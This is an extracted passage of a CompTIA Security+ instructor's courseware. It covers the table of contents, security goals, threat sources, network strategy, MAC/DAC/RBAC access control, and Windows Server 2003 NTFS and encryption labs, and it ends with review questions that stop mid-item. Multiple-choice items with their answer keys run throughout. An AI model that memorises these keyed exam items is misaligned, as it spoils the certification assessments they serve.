Vous êtes sur la page 1sur 614

CompTIA Security+ Certification Instructors Edition

ILT Series
COPYRIGHT Axzo Press. All rights reserved. No part of this work may be reproduced, transcribed, or used in any form or by any meansgraphic, electronic, or mechanical, including photocopying, recording, taping, Web distribution, or information storage and retrieval systemswithout the prior written permission of the publisher. For more information, go to www.courseilt.com.

Trademarks
ILT Series is a trademark of Axzo Press. Some of the product names and company names used in this book have been used for identification purposes only and may be trademarks or registered trademarks of their respective manufacturers and sellers.

Disclaimer
We reserve the right to revise this publication and make changes from time to time in its content without notice.

Contents
Introduction
Topic A: Topic B: Topic C: Topic D:

About the manual............................................................................... vi Setting student expectations .............................................................. xi Classroom setup................................................................................ xix Support.............................................................................................xxvii

Security overview

1-1

Topic A: Introduction to network security....................................................... 1-2 Topic B: Understanding security threats ......................................................... 1-5 Topic C: Creating a secure network strategy................................................... 1-9 Topic D: Windows Server 2003 server access control ................................... 1-13 Unit summary: Security overview................................................................... 1-24

Authentication

2-1

Topic A: Introduction to authentication........................................................... 2-2 Topic B: Kerberos............................................................................................ 2-8 Topic C: Challenge Handshake Authentication Protocol ............................... 2-14 Topic D: Digital certificates............................................................................ 2-16 Topic E: Security tokens ................................................................................ 2-19 Topic F: Biometrics........................................................................................ 2-22 Unit summary: Authentication ........................................................................ 2-30

Attacks and malicious code

3-1

Topic A: Denial of service attacks................................................................... 3-2 Topic B: Man-in-the-middle attacks............................................................... 3-15 Topic C: Spoofing........................................................................................... 3-18 Topic D: Replays ............................................................................................ 3-25 Topic E: TCP session hijacking...................................................................... 3-27 Topic F: Social engineering ........................................................................... 3-29 Topic G: Attacks against encrypted data ........................................................ 3-32 Topic H: Software exploitation....................................................................... 3-37 Unit summary: Attacks and malicious code.................................................... 3-51

Remote access

4-1

Topic A: Securing remote communications..................................................... 4-2 Topic B: Authentication .................................................................................. 4-5 Topic C: Virtual private networks .................................................................. 4-16 Topic D: Telecommuting vulnerabilities ........................................................ 4-27 Unit summary: Remote access ........................................................................ 4-31

E-mail

5-1

Topic A: Secure e-mail and encryption ........................................................... 5-2 Topic B: PGP and S/MIME encryption.......................................................... 5-13 Topic C: E-mail vulnerabilities....................................................................... 5-24 Unit summary: E-mail ..................................................................................... 5-30

Web security

6-1

Topic A: SSL/TLS protocol............................................................................. 6-2

ii

CompTIA Security+ Certification Topic B: Vulnerabilities of Web tools ........................................................... 6-15 Topic C: Configuring Internet Explorer security ........................................... 6-30 Unit summary: Web security .......................................................................... 6-40

Directory and file transfer services

7-1

Topic A: Introduction to directory services..................................................... 7-2 Topic B: File transfer services........................................................................ 7-10 Topic C: File sharing...................................................................................... 7-25 Unit summary: Directory and file transfer services ........................................ 7-28

Wireless and instant messaging

8-1

Topic A: IEEE 802.11 ..................................................................................... 8-2 Topic B: WAP 1.x and WAP 2.0 ................................................................... 8-10 Topic C: Wired equivalent privacy ................................................................ 8-23 Topic D: Instant messaging ............................................................................ 8-36 Unit summary: Wireless and instant messaging ............................................. 8-42

Network devices

9-1

Topic A: Understanding firewalls ................................................................... 9-2 Topic B: Routers ............................................................................................. 9-9 Topic C: Switches .......................................................................................... 9-16 Topic D: Telecom, cable modem, and wireless devices................................. 9-19 Topic E: Securing remote access ................................................................... 9-23 Topic F: Intrusion detection systems ............................................................. 9-26 Topic G: Network monitoring ........................................................................ 9-29 Unit summary: Network devices .................................................................... 9-36

Transmission and storage media

10-1

Topic A: Transmission media......................................................................... 10-2 Topic B: Storage media................................................................................. 10-11 Unit summary: Transmission and storage media........................................... 10-19

Network security topologies

11-1

Topic A: Security topologies.......................................................................... 11-2 Topic B: Network Address Translation.......................................................... 11-7 Topic C: Tunneling ....................................................................................... 11-21 Topic D: Virtual Local Area Networks ......................................................... 11-23 Unit summary: Network security topologies ................................................. 11-29

Intrusion detection

12-1

Topic A: Intrusion detection systems ............................................................. 12-2 Topic B: Network-based and host-based IDS ................................................ 12-5 Topic C: Active and passive detection .......................................................... 12-14 Topic D: Honeypots ...................................................................................... 12-20 Topic E: Incident response............................................................................ 12-25 Unit summary: Intrusion detection ................................................................ 12-28

Security baselines

13-1

Topic A: OS/NOS hardening.......................................................................... 13-2 Topic B: Network hardening......................................................................... 13-14 Topic C: Application hardening .................................................................... 13-23 Topic D: Workstations and servers ............................................................... 13-43 Unit summary: Security baselines ................................................................. 13-55

iii Cryptography 14-1


Topic A: Concepts of cryptography................................................................ 14-2 Topic B: Public Key Infrastructure (PKI)...................................................... 14-11 Topic C: Key management and life cycle...................................................... 14-18 Topic D: Setting up a certificate server ......................................................... 14-26 Unit summary: Cryptography......................................................................... 14-41

Physical security

15-1

Topic A: Access control.................................................................................. 15-2 Topic B: Environment ................................................................................... 15-12 Unit summary: Physical security.................................................................... 15-18

Disaster recovery and business continuity

16-1

Topic A: Disaster recovery ............................................................................. 16-2 Topic B: Business continuity......................................................................... 16-11 Topic C: Policies and procedures .................................................................. 16-14 Topic D: Privilege management .................................................................... 16-24 Unit summary: Disaster recovery and business continuity ............................ 16-28

Computer forensics and advanced topics

17-1

Topic A: Understanding computer forensics .................................................. 17-2 Topic B: Risk identification............................................................................ 17-9 Topic C: Education and training.................................................................... 17-11 Topic D: Auditing .......................................................................................... 17-14 Topic E: Documentation................................................................................ 17-17 Unit summary: Computer forensics and advanced topics .............................. 17-21

Certification exam objectives map Course summary

A-1 S-1

Topic A: Comprehensive exam objectives ......................................................A-2 Topic A: Course summary ............................................................................... S-2 Topic B: Continued learning after class .......................................................... S-7

Glossary Index

G-1 I-1

xxviii

CompTIA Security+ Certification

11

Unit 1 Security overview


Unit time: 60 minutes Complete this unit, and youll know how to:
A Discuss network security. B Discuss security threat trends and their

ramifications.
C Determine the factors involved in creating

a secure network strategy.


D Control access to a Windows Server 2003

server.

12

CompTIA Security+ Certification

Topic A: Introduction to network security


Explanation As personal and business-critical applications become more prevalent on the Internet, network-based applications and services can pose security risks to all information resources. Network security has not been given the attention it deserves, information is an asset, and must be protected. Without adequate protection or network security, a company is highly susceptible to a financial or commercial loss. The fear of a security breach can be just as debilitating to a business as an actual breach. The distrust of the Internet can limit business opportunities for organizations, especially those that are 100% Web-based. Its imperative that organizations enact security policies and procedures and incorporate safeguards that are effective and perceived effective by potential customers. Network security is the process by which digital information assets are protected. The goals of network security are to maintain integrity, protect confidentiality, and assure availability. This includes, but is not limited to, enforcing copyright and privacy laws, protecting against data loss, and ensuring systems are available on an uninterrupted basis. The growth of computing has generated enormous advances in the way people live and work. For the Internet to achieve its potential usefulness, its important that all networks are protected from threats and vulnerabilities. A threat is defined as any activity that poses a danger to your information. A vulnerability is a weakness in a system, such as misconfigured hardware or software, poor design, or end-user carelessness. Threats exploit vulnerabilities in order to gain unauthorized access to a network. Security risks cannot be completely eliminated or prevented, but with effective risk management and assessment, the risks can be minimized to an acceptable level. What is acceptable depends on how much risk the individual or organization is willing to assume. The risk is worth assuming if the benefits of implementing the risk-reducing safeguards far exceed the costs. Effect of evolving technologies on security When networks were first implemented, they consisted of dumb terminals connected to a central mainframe computer. The mainframe was kept in a well-secured computer room and users could connect only via dumb terminals from approved locations over static, point-to-point connections. A username and password were required to access the system and user-access was restricted. Security was very simple given those circumstances. With the development of more extensive network infrastructures made up of hardware and software (specifically, PCs, LANs and WANs), global access to information dramatically increased, as did the need for advanced network security. The introduction of firewalls in 1995 allowed successful businesses to balance security with simple outbound access to the Internet (mostly for e-mail and Web surfing), creating a positive impact to the bottom line of those businesses. The growth of extranets realized tremendous corporate cost savings by connecting internal systems to business partners, by connecting sales-force automation systems to mobile employees, and by providing electronic commerce connections to business customers and consumers. The proliferation of firewalls began to be augmented by intrusion detection, authentication, authorization, and vulnerability assessment systems.

Security overview Today, companies are achieving a balance by keeping the bad guys out with increasingly complex ways of letting the good guys in. Managing risk

13

Security is critical for all types of Internet businesses, by protecting high-availability systems from intrusion and corruption, security technologies help companies build trust with their employees, suppliers, partners, and customersa trust that information is protected and transactions are reliable. When most people talk about security, they mean ensuring that users: 1 Can perform only tasks they are authorized to do 2 Can obtain only information they are authorized to have 3 Cannot cause damage to the data, applications, or operating environment of a system The word security connotes protection against malicious attack by outsiders; security also involves controlling the effects of errors and equipment failures. Anything that can protect against an attack can prevent random misfortune as well.

Goals of network security


The goal of implementing network security is to maintain an acceptable level of integrity, confidentiality, and availability concerning your data. Integrity Integrity refers to the assurance that data is not altered or destroyed in an unauthorized manner. Integrity is maintained when the message received is identical to the message sent. Even for data that is not confidential, data integrity must be maintained. For example, you might not care if anyone sees your routine business transaction, but you would certainly care if the transaction were modified. Confidentiality Confidentiality is the protection of data from unauthorized access by or disclosure to a third party. Whether it is customer data or internal company data, a business is responsible for protecting the privacy of its data. Proprietary company information that is sensitive in nature also needs to remain confidential. Only authorized parties should be granted access to information that has been identified as confidential. The transmission of such information should be performed in a secure manner, preventing any unauthorized access en route. Availability Availability is defined as the assurance that computer services can be accessed when needed, and is the opposite of denial-of-service attacks, which slow down or even crash systems by engulfing network equipment with useless noise. Applications require differing availability levels, depending on the business impact of downtime. For an application to be available, all components, including application and database servers, storage devices, and the end-to-end network, must provide continuous service. The increasing dependence of businesses and organizations on networked applications and the Internet, together with the convergence of voice with data, increases requirements for highly available applications. System downtime of any sort might result in lack of credibility, lower customer satisfaction, and lost revenues.

14
Do it!

CompTIA Security+ Certification

A-1:

Discussing network security

Questions and answers


1 What are the goals of security? (Choose all that apply.)
A B C

Maintain integrity Protect confidentiality Assure availability Improve performance

2 Which one of the following types of access can be threats to networks? A B


C

Authorized Needed Unauthorized Invalid

3 Integrity is maintained when the message sent is identical to the message received. True or false?
True

4 Confidentiality is the protection of data from authorized disclosure to a third party. True or false?
False: It is the protection of data from unauthorized disclosure to a third party.

5 Availability is defined as the continuous operation of computing systems. True or false?


True

Security overview

15

Topic B: Understanding security threats


Explanation The goals of network security are integrity, confidentiality, and availability. Data threats are pervasive in todays society however, and continue to challenge even the most secure systems. Among these threats are: Corporate espionage The FBI estimates every year U.S. companies lose up to $100 billion in business profits because of information theft. This often stems from reports and confidential information being thrown in the trash. Identity theft According to the Identity Theft Resource Center, each year over 700,000 Americans have their personal information used illegally. Computer viruses Computer Economics magazine reports the estimated worldwide impact of malicious code was 13.2 billion dollars in the year 2001 alone. Each company must weigh the cost of network security against the cost of lost assets and decide how much they are willing to risk. When data integrity is compromised, an organization must incur extremely high costs to correct the consequences of attacks. If an unauthorized user makes changes to a Web site that provides the customers with the wrong information about specific items, the organization must further invest to correct the Web site and address any public relations issues with customers. When data confidentiality is compromised, the consequences to the organization are not always immediate, but they are usually costly. Unauthorized users might find scientific data on company research and steal it to use for their own competitive advantage. When application availability is compromised by network outages, organizations can lose millions of dollars in just a few hours. Unauthorized users can take down Web servers and not allow customers to view and obtain information they need. This could cause the customer to go elsewhere for services. The compromising of each of these three security goals can dearly cost an organization. Sometimes the costs are direct, such as when data integrity is compromised or when an e-commerce Web site is rendered unavailable by a denial of service attack. Other times, the costs are indirect, such as when corporate secrets have been stolen or when users lose productivity due to down time.

Sources of threats
There are four primary causes for compromised security: Technology weaknesses Configuration weaknesses Policy weaknesses Human error or malice

16

CompTIA Security+ Certification Technology weaknesses Computer and network technologies have intrinsic security weaknesses in the following areas: TCP/IP A communication protocol suite for routed networks, TCP/IP was designed as an open standard to facilitate communications. Due to its wide usage, there are plenty of experts and expert tools that can compromise this open technology. It cannot guard a network against message-modification attacks or protect connections against unauthorized-access attacks. Operating systems Such as UNIX, Linux, Windows NT and 95, and OS/2 need the latest patches, updates, and upgrades applied to protect users. Network equipment Routers, firewalls, and switches must be protected through the use of password protection, authentication, routing protocols, and firewalls. Configuration weaknesses Even the most secure technology can be misconfigured. Security problems are often caused by one of the following configuration weaknesses: Unsecured accounts User account information might be transmitted unsecurely across the network, exposing usernames and passwords to sniffers, which are programs for monitoring network activity, capable of capturing and analyzing IP packets on an Ethernet network or dial-up connection. System accounts with easily guessed passwords Poorly administered password policies can cause problems in this area. Misconfigured Internet services A common problem is to turn on Java and JavaScript in Web browsers, enabling attacks via hostile Java applets. Another problem is putting high-security data on a Web server; this type of data (social security numbers, credit card numbers) should be behind a firewall and require user authentication and authorization to access. Unsecured default settings Many products have default settings that enable security holes (for example, UNIX sendmail and X Windows). Misconfigured network equipment Misconfiguration of network devices can cause significant security problems. For example, misconfigured access lists, routing protocols, or Simple Network Management Protocol (SNMP) community strings can open up large security holes. Trojan horse programs Delivery vehicles for destructive code, these appear to be harmless programs but are enemies in disguise. They can delete data, mail copies of themselves to e-mail address lists, and open up other computers for attack. Vandals These software applications or applets can destroy a single file or a major portion of a computer system. Viruses These are the largest threat to network security and have proliferated in the past few years. They are designed to replicate themselves and infect computers when triggered by a specific event. The effect of some viruses is minimal and only an inconvenience, while others are more destructive and cause major problems, such as deleting files or slowing down entire systems.

Security overview Human error and malice Human error and malice constitute a significant percentage of breaches in network security. Even well trained and conscientious users can cause great harm to security systems, often without knowing it. Well-intentioned users can contribute to security breaches in several ways:

17

Accident The mistaken destruction, modification, disclosure, or incorrect classification of information. Ignorance Inadequate security awareness, lack of security guidelines, lack of proper documentation, lack of knowledge. Users might inadvertently give information on security weaknesses to attackers. Workload Too many or too few system administrators. Conversely, ill-willed employees or professional hackers and criminals can access valuable assets through deceit: Dishonesty Fraud, theft, embezzlement, and the selling of confidential corporate information. Impersonation Attackers might use the telephone to impersonate employees to persuade users or administrators to give out usernames, passwords, modem numbers, and so on. Disgruntled employees Those who have been fired, laid off, or reprimanded might infect the network with a virus or delete files. Usually one of the largest security threats, these people know the network and the value of the information on it. Snoops Individuals who take part in corporate espionage by gaining unauthorized access to confidential data and providing this information to competitors. Denial-of-service attacks These attacks engulf network equipment with useless noise, thereby causing systems to slow down or even crash.

18
Do it!

CompTIA Security+ Certification

B-1:

Identifying security threats

Questions and answers


1 Which of the following computer and network technologies have intrinsic security weaknesses? A B C
D

TCP/IP Operating systems Network equipment All of the above

2 What is a crime called in which one person masquerades under the identity of another?
A

Identity theft Confidentiality Integrity All of the above

B C D

3 Which of the following is not a primary cause of network security threats?


A

Encryption Technology weaknesses Policy weaknesses Configuration weaknesses Human error

B C D E

4 Trojan horses are destructive programs that masquerade as benign applications. True or false?
True

5 Which of the following is not considered a configuration weakness? A B C


D

Unsecured accounts Misconfigured Internet services Misconfigured access lists Human ignorance

Security overview

19

Topic C: Creating a secure network strategy


Explanation The most important goal of network security is to achieve the state where any action that is not expressly permitted is prohibited. To be successful, a network strategy must address both internal and external threats. Successful strategies look at technical threats and their appropriate responses. They are used to develop the necessary network security policies and procedures for the response effort. A strong security strategy defines policies and procedures and reduces risk across perimeter security, the Internet, intranets, and LANs. When planning a strong security strategy, here are some things to consider: Human factors Knowing your weaknesses Limiting access Achieving security through consistency Physical security Perimeter security Firewalls Web and file servers Access control Change management Encryption Intrusion detection systems Human factors Many security procedures fail because their designers do not truly consider the users. You might want to consider the following questions: Does your network security system recognize that a user has tried to log on to more than one computer at the same time? Can staff members who forgot to log off at work also log on from home using remote dial-up? Can staff members log on to the network from a machine other than their own? Is your security policy built into network management tools so the misconfiguration of a server or router is flagged and noticed? Can an employee remove a hard disk, or add a ZIP drive, CD-R, flash drive, or other removable storage device to a desktop without anyone noticing? Security must be sold to your users and compliance must be enforced. Users must understand and accept the need for security. To reduce your security risk, you must know where your users are, electronically and physically, and whether they are following security policy.

110

CompTIA Security+ Certification Knowing your weaknesses Every security system has vulnerabilities. Attack your own system to determine where your weaknesses are located. Once you identify your weaknesses, you can plug those holes effectively. Determine the areas that present the largest danger to your system and prevent access to them immediately. Add more security to these areas. Is your weakness an internal server, a firewall, a router, or improperly trained staff ? Develop a methodology for testing and ensuring your systems remain safe. Limiting access The security of a system is only as good as the weakest security level of any single host in the system. Not everyone needs to have authorization to every folder or document. Segment your network users, files, and servers. For example, staff members in the Accounting Department do not need access to personnel files in the Human Resource Department. The default access should be no access. From there, you open holes with permissions and authentication allowing authorized users to access resources. If you start from this premise, its easier than starting from open access. Achieving security through consistency Develop a change management process around your network. Whenever there are network upgrades, whether patches, the addition of new users, or updating a firewall, you should document the process and procedures. If you are thorough in documenting the process, you limit your security risks. When you add new users to the network, do you always do the same thing? What if you forget a step? Is your security breached? Be methodical and follow a written process. Physical security It makes no sense to install complicated software security measures when access to the hardware is not controlled. Require authorization into your network room and the different closets in which network equipment is kept; otherwise, unauthorized users can easily access and destroy network equipment in seconds. Perimeter security Perimeter security is controlling access to critical network applications, data, and services. The services offered include secure Web and file servers, gateways, remote access, and naming services. Each organization should be prepared to select perimeter security tools based on their network requirements and budget. Along with the network, for successful perimeter security, blueprints for all campus grounds and buildings are necessary. In addition, all hardware, PCs, and software components must be documented. Firewalls A firewall is a hardware or software solution that contains programs designed to enforce an organizations security policies by restricting access to specific network resources. The firewall creates a protective layer between the network and the outside world. The firewall has built-in filters that can be configured to deny unauthorized or dangerous materials from entering the network. Firewalls log attempted intrusions and create reports.

Security overview Web and file servers

111

Organizations must test mission-critical hosts, workstations, and servers for vulnerabilities. Determine if your organization has the in-house expertise and experience to successfully test the network. If not, outsourcing to a reputable security assessment organization is recommended. Access control Access control ensures that legitimate traffic is allowed into or out of your network. This is done by having users identify themselves via passwords to prove their identity at login. In addition, access must be permitted or denied for each application, function, and file. Most attacks against networks are instances when unauthorized people find a way through the login system. This type of attack happens by guessing or stealing a user identity that is recognized by the system. These attacks are successful because existing networks utilize access control systems, which merely involve entering a user identity together with a password. With this limited security, attacks are simple and common. Many systems do not log invalid password entries into their systems, allowing an attacker to be more persistent. Hackers can continue trying different passwords repeatedly without being noticed. Another type of access control is personal identification numbers (PINs). These are commonly used at banks. The only difference between passwords and PINs is that PINs are usually all numeric and only a few characters long. Security tokens are gaining popularity as well. This hardware plugs into computing devices and dynamically generates a new password at each login. This is done automatically for the user once the user authenticates with a password. Smartcards, with embedded chips, contain code that identifies its holder, or contain keys that can read and send encrypted data. These cards are becoming more popular and are very useful for maintaining security. Change management Change management is a set of procedures developed by network staff that are followed whenever a change is made to the network. Most organizations focus on servers and do not document changes to the backbone, which touches the entire network infrastructure. It is important to document changes to all areas of your IT infrastructure. Encryption Encryption ensures messages cannot be intercepted or read by anyone other than their intended audience. Encryption is usually implemented to protect data that is transported over the public network; it uses advanced algorithms to scramble messages and their attachments. Intrusion detection systems An intrusion detection system (IDS) provides 24/7 network surveillance. It analyzes packet data streams within the network and searches for unauthorized activity. When unauthorized activity is detected, the IDS can send alarms to a management console with details of the activity and can order other systems to cut off the unauthorized session.

112
Do it!

CompTIA Security+ Certification

C-1:

Discussing strategies to secure your network

Questions and answers


1 Ideally, the administrator should give everyone access to everything and start securing when a problem arises. True or false?
False: Start with a default of no access and assign permissions on a need-to-use basis.

2 Which of the following is considered a successful approach to network security? A B C D


E

Knowing your weaknesses Determining the cost Remembering human factors Controlling secrets All of the above

3 Which of the following is/are incorrect about firewalls? A B C


D

Restricts access to specific network resources Contains built-in filters Creates a protective layer between the network and the outside world Is a hardware only solution

4 Examples of access controls might include which of the following? A B C


D

Smartcards Security token PINs All of the above

Security overview

113

Topic D: Windows Server 2003 server access control


This topic covers the following CompTIA Security+ exam objectives.
# 1.1 Objective Recognize and be able to differentiate and explain the following access control models MAC DAC RBAC 5.5 Explain the following concepts of privilege management MAC / DAC / RBAC (Mandatory Access Control / Discretionary Access Control / Role Based Access Control)

Introducing server access control


Explanation Access control is a policy, software component, or hardware component that is used to restrict access to a resource. This could be a password, keypad, badge, or set of permissions granted to the resource. When applied, several levels of security must be passed: Identify The user must show identification. This might involve showing a badge or drivers license, entering a logon ID, or swiping a card. Authenticate The user is authenticated to the network. This can be accomplished with a password, PIN, hand scan, or signature. Authorize The system restricts the users access to a particular resource based on a predetermined set of policies.

MAC, DAC, and RBAC


In discussing access to a resource, three access control models must be addressed: Mandatory access control (MAC) Discretionary access control (DAC) Role-based access control (RBAC) MAC Mandatory access control (MAC) is a non-discretionary control used in high-security locations. Here, you classify all users and resources and assign a security level to the classification. Access requests are denied if the users security level does not match or exceed the security level of the resource. For example, military personnel must have a high-security clearance to read or revise secured documents.

114

CompTIA Security+ Certification DAC Discretionary access control (DAC) allows an owner of a file to dictate who can access the file and to what extent. The owner of the resource creates an access control list (ACL) to list the users with access and the type of access (permissions). Most operating systems provide some form of the read, write, execute, modify, and delete permissions. One of the drawbacks to this method is that each owner controls the access levels to his or her personal files. With inappropriate access control, confidential information can be accidentally or deliberately compromised, or resources can be rendered inaccessible. The assumption is that the owner of the file has the expertise to manage the access levels appropriately. RBAC Role-based access control (RBAC), not to be confused with rule-based access control, is based on the role a user plays in the organization. Instead of giving access to individual users, access control is granted to groups of users who perform a common function. This allows for centralized administration, where access to resources is defined based on roles, and each user is assigned one or more roles. This is considered a nondiscretionary access control.

Using NTFS to implement access control


Almost all network operating systems allow administrators to define or set DAC settings. Windows NT, 2000, Server 2003, and XP Professional computers set DAC values using Windows Explorer. To implement local file security on a Windows NT-based computer, you must convert the FAT partition(s) to NTFS format.

Security overview Do it!

115

D-1:

Converting to an NTFS system Heres why

Heres how
Tell students this activity will show them how to determine whether a file partition is FAT or NTFS, as well as how to convert a FAT partition to NTFS.

1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Run Type cmd Press e
To access the command window. To determine whether a file partition is FAT or NTFS. You will see the message, The type of the file system is FAT 32. E: is not dirty. This indicates that NTFS was not yet installed and there is no corruption on the drive.

The FAT partition in this lab will be designated as drive letter E. However, if you have more drives installed, this might be a higher letter than E:. Be sure students do not change drive C:.

3 At the command line, enter


chkntfs e:

4 At the command line, enter


convert e: /fs:ntfs
If students convert the system partition, theyll have to reboot for the conversion to take place.

To convert the FAT partition to NTFS.

5 If the drive has a volume label, enter it when prompted 6 At the command line, enter
chkntfs e:

Windows will then convert the drive to NTFS.

To verify that the drive is now NTFS.

7 Enter exit

To close the Command window.

116

CompTIA Security+ Certification

Data confidentiality
Explanation After a secure file system is installed, you can begin to think about data confidentiality. Data confidentiality refers to making sure only those intended to have access to certain data actually have that access. With the FAT file system, this is not possible at the local level, but with NTFS, you can lock down both folders and files locally. NTFS can be used to protect data from intruders who might have physical access to the computer containing the data. Exhibit 1-1 shows the default NTFS permissions.

Exhibit 1-1: Default NTFS permissions on a Windows Server 2003 server Do it!

D-2:

Ensuring data confidentiality Heres why


Click Start and choose My Computer. This should be the drive that was converted from FAT to NTFS.

Heres how
In this activity, students will create a folder and files, assign NTFS permissions, and then verify whether the data is confidential.

1 Open My Computer Double-click the E: drive

2 Create a new folder called Confidentiality 3 Double-click the Confidentiality folder 4 Create a new folder called User1Folder 5 Right-click User1Folder Choose Properties 6 Activate the Security tab
The User1Folder Properties screen appears. The Security tab is displayed, as shown in Exhibit 1-1.

Security overview 7 Click Advanced 8 Clear Allow inheritable


permissions from parent to propagate to this object and all child objects. Include these with entries explicitly defined here. Youll be prompted to Copy, Remove, or Cancel.

117

9 Click Copy 10 Click OK 11 Click Add

To retain the permissions. To return to the Security tab. To start the process of adding access permissions for User1. The Select Users or Groups window appears.

12 Click Advanced 13 Click Find Now Under Search results, select


User1 To identify users and groups on the system. You might have to scroll to see User1.

Click OK twice 14 With User1 still highlighted, select Allow for Full Control

To add User1 to the access control list.

Full Control activates all other permissions in the list.


Make sure students don't remove User1.

15 Select each group in the list of Group or user names and Click Remove for each group Click OK 16 Double-click User1Folder 17 Close all windows and log off

To remove the Administrators, Creator Owner, System and Users groups from the access control list. Do not remove User1. To save the changes. You are denied access because you granted access to the folder only to User1.

Tell students User1 does not have a password.

18 Log on as User1 and navigate to the User1Folder 19 Close all windows and log off

To verify that User1 has access to the folder. You should be able to open the folder.

118

CompTIA Security+ Certification

Data availability
Explanation Although it is important that data remains secure and confidential, it is just as important that the data is available when needed. Secured data that is inaccessible results in downtime and is detrimental to a business and its ability to serve customers. Technologies such as clustering and load balancing can help, but if NTFS permissions are assigned inappropriately, these features will not remedy the situation.

Do it!

D-3:

Making data available Heres why

Heres how
In this activity, students will examine how NTFS permissions affect a users access to resources.

1 Log on to the Windows Server 2003 server as Administrator 2 Open My Computer Double-click the E: drive 3 Create a new folder called Availability 4 Double-click the Availability folder 5 Create a folder called User2Folder 6 Right-click User2Folder Choose Properties 7 Activate the Security tab 8 Click Advanced 9 Clear Allow inheritable
permissions from parent to propagate to this object and all child objects. Include these with entries explicitly defined here. Youll be prompted to Copy, Remove, or Cancel. To open the User2Folder Properties window.

10 Click Remove 11 Click OK 12 Click Yes 13 Click Add 14 Click Advanced

To clear the permissions. To return to the Security tab. To acknowledge the Security message and continue. To open the Select Users or Groups window.

Security overview 15 Click Find Now Select User2 Click OK twice 16 With User2 still highlighted, select Allow for Full Control Click OK 17 Close all windows and log off
Point out to students that User2 does not require a password to log on.

119

You might have to scroll to see the user. To add User2 to the access control list. To assign User2s permissions.

To save the changes.

18 Log on as User2 19 Verify that you have access to e:\Availability\User2Folder 20 Close all windows and log off 21 Log on as Administrator 22 Delete the User2 account from the local security database 23 Create a new user, also named User2
Click Start, right-click My Computer and choose Manage. Expand Local Users and Groups. Select Users and delete User2. With Users selected, choose Action, New User. Enter User2 as the User name, clear User must change password at next logon and click Create. Click Close.

24 Display the Security tab in the properties of e:\Availability\User2Folder

Notice that the User2 account is no longer listed, but the accounts SID is.

25 Logon as User2 and try to access the e:\Availability\ User2Folder 26 Close all windows and log off

You are denied access to this folder.

120

CompTIA Security+ Certification

Data integrity
Explanation After data is secured properly and available to the appropriate people, it is important to make sure the contents of the data have not been altered accidentally or intentionally. Malicious corruption is a problem, and can be done by a virus, worm, or hacker. Accidental changes, however, can also damage data integrity. For example, Windows Server 2003 file synchronization capabilities could easily lead to accidental corruption. Changes made to data that conflict with other changes to the same data could damage data integrity just as much as a hacker can. Environmental problems can lead to data integrity issues, such problems include; dust, surges, and excessive heat. Windows Server 2003 default permissions are configured in such a way that only the creator of a file and users who belong to the System Administrators group can change a file by default. Members of the Users group can view a file by default, but cannot make changes. To enable others to change a file, permissions have to be specifically assigned.

Security overview Do it!

121

D-4:

Maintaining data integrity Heres why

Heres how
1 Log on to the Windows Server 2003 server as User1 2 In My Computer, display the E: drive 3 Create a new folder called Integrity 4 Within the Integrity folder, create a new folder called User1Folder 5 Within User1Folder, create a new text document 6 Type This document has not
been modified accidentally or intentionally.

In the new text document.

7 Save the file as


New Text Document

8 Close the document 9 Log off User1 10 Log on as User2 11 Navigate to e:\Integrity\User1Folder 12 From the New Text Document, remove the word not 13 Try to save the file to save the changes 14 Close all windows and log off User2
You did change the default permissions to e:\Integrity\User1Folder, so you can still view the contents of the file as User2. You receive an error message that you can't save the file. The data integrity of the file is maintained.

122

CompTIA Security+ Certification

Data encryption
Explanation With NTFS, you are not limited to folder- and file-level security. Another function of NTFS is the ability to encrypt data. Encryption is the process of taking readable data and making it unreadable. Encryption is commonly used for remote data transfer, but it can also be used for local security. Laptop users might want to use NTFS to secure and encrypt their data in the event the laptop is stolen. While this solution is not 100% effective, it does make it more difficult to hack into your system. Windows Server 2003 offers a very easy way to encrypt files on an NTFS partition.

Do it!

D-5:

Encrypting data Heres why

Heres how
This activity demonstrates how to encrypt data within a file.

1 Log on to the Windows Server 2003 server as User2 2 In My Computer, open the E: drive 3 Create a new folder called Encryption 4 Within the Encryption folder, create a new folder called User2Folder 5 Within User2Folder, create a new text document Edit the content to read
This document is for my eyes only.

6 Save the document as


Private Document

Close the document 7 Right-click the document Choose Properties

Security overview 8 Click Advanced

123

Check Encrypt contents to


secure data

Click OK 9 Click OK a second time

10 Select the Encrypt the file only radio button Click OK 11 Log off as User2 12 Log on as User1 13 Try to access the Private Document file in e:\Encryption\User2Folder 14 Logoff User 1
Access should be denied. You'll also notice the file name displays in green to indicate it's been encrypted.

124

CompTIA Security+ Certification

Unit summary: Security overview


Topic A In this topic we discussed the importance of network security. You learned that network security is the process by which digital information assets are protected. You also learned the goals of network security: integrity, confidentiality, and availability. You learned that confidentiality is the protection of data from unauthorized disclosure to a third party, availability is the continuous operation of computing systems, and integrity is the assurance that data has not been altered or destroyed. In this topic, you learned about the types of threats and their ramifications. You learned there are four primary causes for network security breaches: technology weaknesses, configuration weaknesses, policy weaknesses, and human error or malice. In this topic, you learned about the goals of network security. You learned the most important goal of network security is to achieve the state where any action that is not expressly permitted is prohibited. You also learned how to create a secure network strategy. You learned that the goal in developing a security policy is to define the organizations expectations for computer and network use. In this topic, you learned about the three methods of access control: MAC, DAC and RBAC. You implemented network security on an NTFS system and learned how to ensure data confidentiality, availability and integrity. You also learned how to encrypt data.

Topic B

Topic C

Topic D

Review questions
1 What file systems are compatible with Windows NT 4.0?
A

FAT

B FAT32 C OSPF
D

NTFS

2 Which of the following commands will convert a FAT partition to NTFS? A update C: /FS:NTFS B upgrade C: /FS:NTFS
C

convert C: /FS:NTFS

D convert C: /NTFS

Security overview 3 Which of the following is the best definition of data confidentiality? A Data that has not been tampered with intentionally or accidentally B Data that has been scrambled for remote transmission
C

125

Data that is secured so only the intended people have access

D Data that can be accessed when it is needed 4 Which of the following is the best definition of data availability? A Data that has not been tampered with intentionally or accidentally B Data that has been scrambled for remote transmission C Data that is secured so only the intended people have access
D

Data that can be accessed when it is needed

5 How can data confidentiality affect data availability? A They are two independent areas and do not affect each other B For data to be available, it cannot be confidential
C

Data that is secured too strongly might conflict with the availability

D Data that is secured too weakly might conflict with the availability 6 Which of the following is the best definition of data integrity?
A

Data that has not been tampered with intentionally or accidentally

B Data that has been scrambled for remote transmission C Data that is secured so only the intended people have access D Data that can be accessed when it is needed 7 Which of the following can damage data integrity? (Choose all that apply.)
A B C D

Viruses Worms Hackers Trojan Horses

126

CompTIA Security+ Certification 8 Data Integrity can also be threatened by environmental hazards such as dust, surges, and excessive heat. True or false?
True

9 Which of the following is the best definition of encryption? A Data that has not been tampered with intentionally or accidentally
B

